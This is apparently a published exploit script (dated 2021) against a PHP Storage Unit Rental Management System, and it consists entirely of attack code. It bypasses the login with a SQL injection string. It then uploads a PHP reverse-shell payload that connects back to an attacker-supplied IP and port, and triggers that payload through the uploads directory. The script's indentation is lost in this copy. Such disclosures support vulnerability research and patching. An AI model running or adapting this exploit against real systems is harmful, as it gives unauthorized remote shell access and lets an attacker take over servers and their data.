# Date: 28.09.2021
# Exploit Author: Fikrat Ghuliev (Ghuliev)
# Vendor Homepage: https://www.sourcecodester.com/php/14932/storage-unit-rental-management-system-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14932&title=Storage+Unit+Rental+Management+System+using+PHP+Free+Source+Code
# Version: 1
# Tested on: Ubuntu
import requests
from bs4 import BeautifulSoup
import sys
import random
import string
import time
if len(sys.argv) != 4:
print("[~] Usage : python3 exploit.py localhost ip port")
exit()
site = sys.argv[1]
ip = sys.argv[2]
port = sys.argv[3]
shellcode = "<?php $sock=fsockopen('"
+ip+"',"+port+");exec('/bin/sh -i <&3 >&3
2>&3'); ?>"
letters = string.ascii_lowercase
name = ''.join(random.choice(letters) for i in range(5))
def LoginAndShellUpload():
login = 'http://'+site+':80/storage/classes/Login.php?f=login'
session = requests.session()
post_data = {"username": "' OR 1=1-- -", "password": "aa"}
user_login = session.post(login, data=post_data)
cookie = session.cookies.get_dict()
print('[+]Success login')
print('[+]Try Shell upload')
time.sleep(2)
#shell upload
url =
'http://'+site+':80/storage/classes/SystemSettings.php?f=update_settings'
cookies = cookie
headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64;
rv:92.0) Gecko/20100101 Firefox/92.0", "Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip,
deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type":
"multipart/form-data;
boundary=---------------------------246884504016047375913085888751",
"Origin": "http://localhost", "Connection": "close", "Referer":
"http://localhost/storage/admin/?page=system_info",
"Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "same-origin"}
data =
"-----------------------------246884504016047375913085888751\r\nContent-Disposition:
form-data; name=\"name\"\r\n\r\nStorage Unit Rental Management
System -
PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition:
form-data; name=\"short_name\"\r\n\r\nSURMS -
PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition:
form-data; name=\"img\"; filename=\"\"\r\nContent-Type:
application/octet-stream\r\n\r\n\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition:
form-data; name=\"cover\";
filename=\""+name+".php\"\r\nContent-Type:
application/x-php\r\n\r\n"+shellcode+"\n\n\r\n-----------------------------246884504016047375913085888751--\r\n"
requests.post(url, headers=headers, cookies=cookies, data=data)
print('[+]Success!')
print('[+]Getting reverse shell')
time.sleep(2)
def RCE():
path = 'http://'+site+'/storage/uploads/'
html_text = requests.get(path).text
soup = BeautifulSoup(html_text, 'html.parser')
for link in soup.find_all('a'):
data = link.get('href')
with open('shell_location.txt', 'w') as f:
f.write(data)
path2 = 'shell_location.txt'
shell_file = open(path2,'r')
shell = shell_file.readline()
r = requests.get('http://'+site+'/storage/uploads/'+shell)
print(r.text)
print('[+]Hacked!')
LoginAndShellUpload()
RCE()